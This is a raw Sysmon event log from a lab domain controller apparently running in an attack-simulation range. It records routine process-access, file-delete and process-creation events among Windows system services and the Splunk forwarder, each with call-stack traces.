12:02:14.331{266CAFBE-64C6-6064-A900-00000000AE01}34044568C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000004687Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.331{266CAFBE-64C6-6064-A900-00000000AE01}34042980C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004686Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.284{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AA84EBE69F5C997D9BD051CDCFFF13B,SHA256=1590D2B72DD69CCA9CA9B0A59D29C991612EBB02556F9183318A0D55A5DAB57C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000004685Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.253{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=156C759C1B0AF02A777AA64C20C98937,SHA256=8C7B033C02098ADE42EB17B191F63E134F6B044103F8BC2892A598A9BDF8B0F9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004684Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.253{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64C6-6064-A800-00000000AE01}2512C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004683Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.253{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004682Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:14.253{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004681Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.253{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004680Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:14.253{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004679Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.253{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64C6-6064-A800-00000000AE01}2512C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004678Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.253{266CAFBE-647D-6064-2F00-00000000AE01}27964104C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64C6-6064-A800-00000000AE01}2512C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000004677Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.114{266CAFBE-64C6-6064-A800-00000000AE01}2512C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004676Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:14.128{266CAFBE-646A-6064-0A00-00000000AE01}8403012C:\Windows\system32\services.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004675Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.128{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004674Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:14.113{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004673Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.113{266CAFBE-646A-6064-0A00-00000000AE01}8403048C:\Windows\system32\services.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004672Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:14.113{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004671Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.113{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000004670Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.113{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004669Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.113{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000004668Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.097{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004667Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.097{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000004666Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.097{266CAFBE-64C5-6064-A700-00000000AE01}43883160C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+bf29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000004665Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:14.097{266CAFBE-64C5-6064-A700-00000000AE01}43883160C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+beb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000004664Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:14.097{266CAFBE-64C5-6064-A700-00000000AE01}43883160C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+b71e|c:\windows\system32\appreadiness.dll+b625|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000004663Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:14.097{266CAFBE-64C5-6064-A700-00000000AE01}43883160C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+b680|c:\windows\system32\appreadiness.dll+b625|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 